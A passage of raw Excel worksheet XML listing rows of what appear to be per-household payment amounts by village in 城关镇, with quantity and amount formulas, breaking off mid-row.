    <row r="588" customHeight="1" spans="1:11">
      <c r="A588" s="16" t="s">
        <v>1620</v>
      </c>
      <c r="B588" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C588" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D588" s="17" t="s">
        <v>1621</v>
      </c>
      <c r="E588" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F588" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G588" s="17">
        <v>1</v>
      </c>
      <c r="H588" s="18">
        <v>365</v>
      </c>
      <c r="I588" s="17">
        <f>H588*G588</f>
        <v>365</v>
      </c>
      <c r="J588" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K588" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="589" customHeight="1" spans="1:11">
      <c r="A589" s="16" t="s">
        <v>1622</v>
      </c>
      <c r="B589" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C589" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D589" s="17" t="s">
        <v>1623</v>
      </c>
      <c r="E589" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F589" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G589" s="17">
        <v>1</v>
      </c>
      <c r="H589" s="18">
        <v>365</v>
      </c>
      <c r="I589" s="17">
        <f>H589*G589</f>
        <v>365</v>
      </c>
      <c r="J589" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K589" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="590" customHeight="1" spans="1:11">
      <c r="A590" s="16" t="s">
        <v>1624</v>
      </c>
      <c r="B590" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C590" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D590" s="17" t="s">
        <v>1625</v>
      </c>
      <c r="E590" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F590" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G590" s="17">
        <v>1</v>
      </c>
      <c r="H590" s="18">
        <v>365</v>
      </c>
      <c r="I590" s="17">
        <f>H590*G590</f>
        <v>365</v>
      </c>
      <c r="J590" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K590" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="591" customHeight="1" spans="1:11">
      <c r="A591" s="16" t="s">
        <v>1626</v>
      </c>
      <c r="B591" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C591" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D591" s="17" t="s">
        <v>1627</v>
      </c>
      <c r="E591" s="17" t="s">
        <v>545</v>
      </c>
      <c r="F591" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G591" s="17">
        <v>2</v>
      </c>
      <c r="H591" s="18">
        <v>325</v>
      </c>
      <c r="I591" s="17">
        <f>H591*G591</f>
        <v>650</v>
      </c>
      <c r="J591" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K591" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="592" customHeight="1" spans="1:11">
      <c r="A592" s="16" t="s">
        <v>1628</v>
      </c>
      <c r="B592" s="17" t="str">
        <f>B591</f>
        <v>城关镇</v>
      </c>
      <c r="C592" s="17" t="str">
        <f>C591</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D592" s="23" t="s">
        <v>1629</v>
      </c>
      <c r="E592" s="23" t="s">
        <v>1630</v>
      </c>
      <c r="F592" s="17" t="str">
        <f>F591</f>
        <v>4113210106</v>
      </c>
      <c r="G592" s="17"/>
      <c r="H592" s="17"/>
      <c r="I592" s="17"/>
      <c r="J592" s="17"/>
      <c r="K592" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="593" customHeight="1" spans="1:11">
      <c r="A593" s="16" t="s">
        <v>1631</v>
      </c>
      <c r="B593" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C593" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D593" s="17" t="s">
        <v>1632</v>
      </c>
      <c r="E593" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F593" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G593" s="17">
        <v>1</v>
      </c>
      <c r="H593" s="18">
        <v>365</v>
      </c>
      <c r="I593" s="17">
        <f>H593*G593</f>
        <v>365</v>
      </c>
      <c r="J593" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K593" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="594" customHeight="1" spans="1:11">
      <c r="A594" s="16" t="s">
        <v>1633</v>
      </c>
      <c r="B594" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C594" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D594" s="17" t="s">
        <v>1634</v>
      </c>
      <c r="E594" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F594" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G594" s="17">
        <v>1</v>
      </c>
      <c r="H594" s="18">
        <v>365</v>
      </c>
      <c r="I594" s="17">
        <f>H594*G594</f>
        <v>365</v>
      </c>
      <c r="J594" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K594" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="595" customHeight="1" spans="1:11">
      <c r="A595" s="16" t="s">
        <v>1635</v>
      </c>
      <c r="B595" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C595" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D595" s="17" t="s">
        <v>1636</v>
      </c>
      <c r="E595" s="17" t="s">
        <v>1637</v>
      </c>
      <c r="F595" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G595" s="17">
        <v>1</v>
      </c>
      <c r="H595" s="18">
        <v>365</v>
      </c>
      <c r="I595" s="17">
        <f t="shared" ref="I595:I603" si="24">H595*G595</f>
        <v>365</v>
      </c>
      <c r="J595" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K595" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="596" customHeight="1" spans="1:11">
      <c r="A596" s="16" t="s">
        <v>1638</v>
      </c>
      <c r="B596" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C596" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D596" s="17" t="s">
        <v>1639</v>
      </c>
      <c r="E596" s="17" t="s">
        <v>1640</v>
      </c>
      <c r="F596" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G596" s="17">
        <v>1</v>
      </c>
      <c r="H596" s="18">
        <v>365</v>
      </c>
      <c r="I596" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J596" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K596" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="597" customHeight="1" spans="1:11">
      <c r="A597" s="16" t="s">
        <v>1641</v>
      </c>
      <c r="B597" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C597" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D597" s="17" t="s">
        <v>1642</v>
      </c>
      <c r="E597" s="17" t="s">
        <v>1284</v>
      </c>
      <c r="F597" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G597" s="17">
        <v>1</v>
      </c>
      <c r="H597" s="18">
        <v>365</v>
      </c>
      <c r="I597" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J597" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K597" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="598" customHeight="1" spans="1:11">
      <c r="A598" s="16" t="s">
        <v>1643</v>
      </c>
      <c r="B598" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C598" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D598" s="17" t="s">
        <v>1644</v>
      </c>
      <c r="E598" s="17" t="s">
        <v>1645</v>
      </c>
      <c r="F598" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G598" s="17">
        <v>1</v>
      </c>
      <c r="H598" s="18">
        <v>365</v>
      </c>
      <c r="I598" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J598" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K598" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="599" customHeight="1" spans="1:11">
      <c r="A599" s="16" t="s">
        <v>1646</v>
      </c>
      <c r="B599" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C599" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D599" s="17" t="s">
        <v>1647</v>
      </c>
      <c r="E599" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F599" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G599" s="17">
        <v>1</v>
      </c>
      <c r="H599" s="18">
        <v>365</v>
      </c>
      <c r="I599" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J599" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K599" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="600" customHeight="1" spans="1:11">
      <c r="A600" s="16" t="s">
        <v>1648</v>
      </c>
      <c r="B600" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C600" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D600" s="17" t="s">
        <v>1649</v>
      </c>
      <c r="E600" s="17" t="s">
        <v>1650</v>
      </c>
      <c r="F600" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G600" s="17">
        <v>1</v>
      </c>
      <c r="H600" s="18">
        <v>365</v>
      </c>
      <c r="I600" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J600" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K600" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="601" customHeight="1" spans="1:11">
      <c r="A601" s="16" t="s">
        <v>1651</v>
      </c>
      <c r="B601" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C601" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D601" s="17" t="s">
        <v>1652</v>
      </c>
      <c r="E601" s="17" t="s">
        <v>1653</v>
      </c>
      <c r="F601" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G601" s="17">
        <v>1</v>
      </c>
      <c r="H601" s="18">
        <v>365</v>
      </c>
      <c r="I601" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J601" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K601" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="602" customHeight="1" spans="1:11">
      <c r="A602" s="16" t="s">
        <v>1654</v>
      </c>
      <c r="B602" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C602" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D602" s="17" t="s">
        <v>1655</v>
      </c>
      <c r="E602" s="17" t="s">
        <v>1656</v>
      </c>
      <c r="F602" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G602" s="17">
        <v>1</v>
      </c>
      <c r="H602" s="18">
        <v>365</v>
      </c>
      <c r="I602" s="17">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J602" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K602" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="603" customHeight="1" spans="1:11">
      <c r="A603" s="16" t="s">
        <v>1657</v>
      </c>
      <c r="B603" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C603" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D603" s="17" t="s">
        <v>1658</v>
      </c>
      <c r="E603" s="17" t="s">
        <v>1659</v>
      </c>
      <c r="F603" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G603" s="17">
        <v>2</v>
      </c>
      <c r="H603" s="18">
        <v>325</v>
      </c>
      <c r="I603" s="17">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J603" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K603" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="604" customHeight="1" spans="1:11">
      <c r="A604" s="16" t="s">
        <v>1660</v>
      </c>
      <c r="B604" s="17" t="str">
        <f>B603</f>
        <v>城关镇</v>
      </c>
      <c r="C604" s="17" t="str">
        <f>C603</f>
        <v>西北村</v>
      </c>
      <c r="D604" s="24" t="s">
        <v>1661</v>
      </c>
      <c r="E604" s="24" t="s">
        <v>1662</v>
      </c>
      <c r="F604" s="17" t="str">
        <f>F603</f>
        <v>4113210106</v>
      </c>
      <c r="G604" s="17"/>
      <c r="H604" s="17"/>
      <c r="I604" s="17"/>
      <c r="J604" s="17"/>
      <c r="K604" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="605" customHeight="1" spans="1:11">
      <c r="A605" s="16" t="s">
        <v>1663</v>
      </c>
      <c r="B605" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C605" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D605" s="17" t="s">
        <v>1664</v>
      </c>
      <c r="E605" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F605" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G605" s="17">
        <v>1</v>
      </c>
      <c r="H605" s="18">
        <v>365</v>
      </c>
      <c r="I605" s="17">
        <f t="shared" ref="I605:I614" si="25">H605*G605</f>
        <v>365</v>
      </c>
      <c r="J605" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K605" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="606" customHeight="1" spans="1:11">
      <c r="A606" s="16" t="s">
        <v>1665</v>
      </c>
      <c r="B606" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C606" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D606" s="17" t="s">
        <v>1666</v>
      </c>
      <c r="E606" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F606" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G606" s="17">
        <v>1</v>
      </c>
      <c r="H606" s="18">
        <v>365</v>
      </c>
      <c r="I606" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J606" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K606" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="607" customHeight="1" spans="1:11">
      <c r="A607" s="16" t="s">
        <v>1667</v>
      </c>
      <c r="B607" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C607" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D607" s="17" t="s">
        <v>1668</v>
      </c>
      <c r="E607" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F607" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G607" s="17">
        <v>1</v>
      </c>
      <c r="H607" s="18">
        <v>365</v>
      </c>
      <c r="I607" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J607" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K607" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="608" customHeight="1" spans="1:11">
      <c r="A608" s="16" t="s">
        <v>1669</v>
      </c>
      <c r="B608" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C608" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D608" s="17" t="s">
        <v>1670</v>
      </c>
      <c r="E608" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F608" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G608" s="17">
        <v>1</v>
      </c>
      <c r="H608" s="18">
        <v>365</v>
      </c>
      <c r="I608" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J608" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K608" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="609" customHeight="1" spans="1:11">
      <c r="A609" s="16" t="s">
        <v>1671</v>
      </c>
      <c r="B609" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C609" s="17" t="s">
        <v>1221</v>
      </c>
      <c r="D609" s="17" t="s">
        <v>1672</v>
      </c>
      <c r="E609" s="17" t="s">
        <v>1673</v>
      </c>
      <c r="F609" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G609" s="17">
        <v>1</v>
      </c>
      <c r="H609" s="18">
        <v>365</v>
      </c>
      <c r="I609" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J609" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K609" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="610" customHeight="1" spans="1:11">
      <c r="A610" s="16" t="s">
        <v>1674</v>
      </c>
      <c r="B610" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C610" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D610" s="17" t="s">
        <v>1675</v>
      </c>
      <c r="E610" s="17" t="s">
        <v>1676</v>
      </c>
      <c r="F610" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G610" s="17">
        <v>1</v>
      </c>
      <c r="H610" s="18">
        <v>365</v>
      </c>
      <c r="I610" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J610" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K610" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="611" customHeight="1" spans="1:11">
      <c r="A611" s="16" t="s">
        <v>1677</v>
      </c>
      <c r="B611" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C611" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D611" s="17" t="s">
        <v>1678</v>
      </c>
      <c r="E611" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F611" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G611" s="17">
        <v>1</v>
      </c>
      <c r="H611" s="18">
        <v>365</v>
      </c>
      <c r="I611" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J611" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K611" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="612" customHeight="1" spans="1:11">
      <c r="A612" s="16" t="s">
        <v>1679</v>
      </c>
      <c r="B612" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C612" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D612" s="17" t="s">
        <v>1680</v>
      </c>
      <c r="E612" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F612" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G612" s="17">
        <v>1</v>
      </c>
      <c r="H612" s="18">
        <v>365</v>
      </c>
      <c r="I612" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J612" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K612" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="613" customHeight="1" spans="1:11">
      <c r="A613" s="16" t="s">
        <v>1681</v>
      </c>
      <c r="B613" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C613" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D613" s="17" t="s">
        <v>1682</v>
      </c>
      <c r="E613" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F613" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G613" s="17">
        <v>1</v>
      </c>
      <c r="H613" s="18">
        <v>365</v>
      </c>
      <c r="I613" s="17">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J613" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K613" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="614" customHeight="1" spans="1:11">
      <c r="A614" s="16" t="s">
        <v>1683</v>
      </c>
      <c r="B614" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C614" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D614" s="17" t="s">
        <v>1684</v>
      </c>
      <c r="E614" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F614" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G614" s="17">
        <v>2</v>
      </c>
      <c r="H614" s="18">
        <v>325</v>
      </c>
      <c r="I614" s="17">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J614" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K614" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="615" customHeight="1" spans="1:11">
      <c r="A615" s="16" t="s">
        <v>1685</v>
      </c>
      <c r="B615" s="17" t="str">
        <f>B614</f>
        <v>城关镇</v>
      </c>
      <c r="C615" s="17" t="str">
        <f>C614</f>
        <v>东北村</v>
      </c>
      <c r="D615" s="23" t="s">
        <v>1686</v>
      </c>
      <c r="E615" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F615" s="17" t="str">
        <f>F614</f>
        <v>4113210103</v>
      </c>
      <c r="G615" s="17"/>
      <c r="H615" s="17"/>
      <c r="I615" s="17"/>
      <c r="J615" s="17"/>
      <c r="K615" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="616" customHeight="1" spans="1:11">
      <c r="A616" s="16" t="s">
        <v>1687</v>
      </c>
      <c r="B616" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C616" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D616" s="17" t="s">
        <v>1689</v>
      </c>
      <c r="E616" s="17" t="s">
        <v>1277</v>
      </c>
      <c r="F616" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G616" s="17">
        <v>2</v>
      </c>
      <c r="H616" s="18">
        <v>345</v>
      </c>
      <c r="I616" s="17">
        <f>H616*G616</f>
        <v>690</v>
      </c>
      <c r="J616" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K616" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="617" customHeight="1" spans="1:11">
      <c r="A617" s="16" t="s">
        <v>1690</v>
      </c>
      <c r="B617" s="17" t="str">
        <f>B616</f>
        <v>城关镇</v>
      </c>
      <c r="C617" s="17" t="str">
        <f>C616</f>
        <v>城关西北</v>
      </c>
      <c r="D617" s="23" t="s">
        <v>1691</v>
      </c>
      <c r="E617" s="24" t="s">
        <v>603</v>
      </c>
      <c r="F617" s="17" t="str">
        <f>F616</f>
        <v>4113210106</v>
      </c>
      <c r="G617" s="17"/>
      <c r="H617" s="17"/>
      <c r="I617" s="17"/>
      <c r="J617" s="17"/>
      <c r="K617" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="618" customHeight="1" spans="1:11">
      <c r="A618" s="16" t="s">
        <v>1692</v>
      </c>
      <c r="B618" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C618" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D618" s="17" t="s">
        <v>1693</v>
      </c>
      <c r="E618" s="17" t="s">
        <v>1694</v>
      </c>
      <c r="F618" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G618" s="17">
        <v>1</v>
      </c>
      <c r="H618" s="18">
        <v>365</v>
      </c>
      <c r="I618" s="17">
        <f>H618*G618</f>
        <v>365</v>
      </c>
      <c r="J618" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K618" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="619" customHeight="1" spans="1:11">
      <c r="A619" s="16" t="s">
        <v>1695</v>
      </c>
      <c r="B619" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C619" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D619" s="17" t="s">
        <v>1697</v>
      </c>
      <c r="E619" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F619" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G619" s="17">
        <v>1</v>
      </c>
      <c r="H619" s="18">
        <v>365</v>
      </c>
      <c r="I619" s="17">
        <f>H619*G619</f>
        <v>365</v>
      </c>
      <c r="J619" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K619" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="620" customHeight="1" spans="1:11">
      <c r="A620" s="16" t="s">
        <v>1698</v>
      </c>
      <c r="B620" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C620" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D620" s="17" t="s">
        <v>1699</v>
      </c>
      <c r="E620" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F620" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G620" s="17">
        <v>1</v>
      </c>
      <c r="H620" s="18">
        <v>365</v>
      </c>
      <c r="I620" s="17">
        <f>H620*G620</f>
        <v>365</v>
      </c>
      <c r="J620" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K620" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="621" customHeight="1" spans="1:11">
      <c r="A621" s="16" t="s">
        <v>1700</v>
      </c>
      <c r="B621" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C621" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D621" s="17" t="s">
        <v>1701</v>
      </c>
      <c r="E621" s="17" t="s">
        <v>276</v>
      </c>
      <c r="F621" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G621" s="17">
        <v>2</v>
      </c>
      <c r="H621" s="18">
        <v>325</v>
      </c>
      <c r="I621" s="17">
        <f>H621*G621</f>
        <v>650</v>
      </c>
      <c r="J621" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K621" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="622" customHeight="1" spans="1:11">
      <c r="A622" s="16" t="s">
        <v>1702</v>
      </c>
      <c r="B622" s="17" t="str">
        <f>B621</f>
        <v>城关镇</v>
      </c>
      <c r="C622" s="17" t="str">
        <f>C621</f>
        <v>城关中华</v>
      </c>
      <c r="D622" s="23" t="s">
        <v>1703</v>
      </c>
      <c r="E622" s="24" t="s">
        <v>1704</v>
      </c>
      <c r="F622" s="17" t="str">
        <f>F621</f>
        <v>4113210108</v>
      </c>
      <c r="G622" s="17"/>
      <c r="H622" s="17"/>
      <c r="I622" s="17"/>
      <c r="J622" s="17"/>
      <c r="K622" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="623" customHeight="1" spans="1:11">
      <c r="A623" s="16" t="s">
        <v>1705</v>
      </c>
      <c r="B623" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C623" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D623" s="17" t="s">
        <v>1706</v>
      </c>
      <c r="E623" s="17" t="s">
        <v>1707</v>
      </c>
      <c r="F623" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G623" s="17">
        <v>1</v>
      </c>
      <c r="H623" s="18">
        <v>365</v>
      </c>
      <c r="I623" s="17">
        <f t="shared" ref="I623:I630" si="26">H623*G623</f>
        <v>365</v>
      </c>
      <c r="J623" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K623" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="624" customHeight="1" spans="1:11">
      <c r="A624" s="16" t="s">
        <v>1708</v>
      </c>
      <c r="B624" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C624" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D624" s="17" t="s">
        <v>1709</v>
      </c>
      <c r="E624" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F624" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G624" s="17">
        <v>1</v>
      </c>
      <c r="H624" s="18">
        <v>365</v>
      </c>
      <c r="I624" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J624" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K624" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="625" customHeight="1" spans="1:11">
      <c r="A625" s="16" t="s">
        <v>1710</v>
      </c>
      <c r="B625" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C625" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D625" s="17" t="s">
        <v>1711</v>
      </c>
      <c r="E625" s="17" t="s">
        <v>334</v>
      </c>
      <c r="F625" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G625" s="17">
        <v>1</v>
      </c>
      <c r="H625" s="18">
        <v>365</v>
      </c>
      <c r="I625" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J625" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K625" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="626" customHeight="1" spans="1:11">
      <c r="A626" s="16" t="s">
        <v>1712</v>
      </c>
      <c r="B626" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C626" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D626" s="17" t="s">
        <v>1714</v>
      </c>
      <c r="E626" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F626" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G626" s="17">
        <v>1</v>
      </c>
      <c r="H626" s="18">
        <v>365</v>
      </c>
      <c r="I626" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J626" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K626" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="627" customHeight="1" spans="1:11">
      <c r="A627" s="16" t="s">
        <v>1715</v>
      </c>
      <c r="B627" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C627" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D627" s="17" t="s">
        <v>1716</v>
      </c>
      <c r="E627" s="17" t="s">
        <v>1717</v>
      </c>
      <c r="F627" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G627" s="17">
        <v>1</v>
      </c>
      <c r="H627" s="18">
        <v>365</v>
      </c>
      <c r="I627" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J627" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K627" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="628" customHeight="1" spans="1:11">
      <c r="A628" s="16" t="s">
        <v>1718</v>
      </c>
      <c r="B628" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C628" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D628" s="17" t="s">
        <v>1719</v>
      </c>
